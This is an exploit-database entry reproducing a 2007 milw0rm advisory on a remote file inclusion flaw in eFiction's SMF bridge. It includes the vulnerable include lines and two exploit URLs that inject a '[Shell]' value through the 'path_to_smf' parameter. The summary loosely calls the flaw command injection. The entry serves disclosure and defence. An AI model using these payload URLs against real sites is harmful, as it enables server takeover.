header-logo
Suggest Exploit
vendor:
Not provided
by:
ThE dE@Th
7.5
CVSS
HIGH
Path Disclosure and Remote Code Execution
Not provided
CWE
Product Name: Not provided
Affected Version From: Not provided
Affected Version To: Not provided
Patch Exists: NO
Related CWE: Not provided
CPE: Not provided
Metasploit:
Other Scripts:
Platforms Tested: Not provided
2007

SMF Path Disclosure and Remote Code Execution

The vulnerability allows an attacker to disclose the path of sensitive files on the server and execute arbitrary code by injecting a shell command in the 'path_to_smf' parameter in two different PHP files: 'logout.php' and 'get_session_vars.php'. This vulnerability was discovered by ThE dE@Th from the AsB-MaY DiScOvEr ExPlIoTs Gr0uP.

Mitigation:

The vendor should sanitize user-supplied input in the 'path_to_smf' parameter to prevent command injection and disclose sensitive information. Additionally, the use of proper access controls and file permission settings can mitigate the impact of this vulnerability.
Source

Exploit-DB raw data:

********************************************************************************
To ConTacT mE @ www.Asb-May.net/bb
ScRiPt:-http://www.efiction.org/downloads/eFiction31.zip
GrEaTz To:-ToOofa-HaCk.eGy (All AsB-MaY DisCoverY ExPloIts GrOup)
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}   >>
******************************************************************************
logout.php:-
include_once($path_to_smf."Sources/Subs-Auth.php");

get_session_vars.php:-
require_once($path_to_smf."SSI.php");
********************************************************************************
ExPlOiT:-http://www.SitE.com/bridges/SMF/logout.php?path_to_smf=[Shell]
ExPlOiT:-http://www.SitE.com/get_session_vars.php?path_to_smf=[Shell]
********************************************************************************

# milw0rm.com [2007-02-22]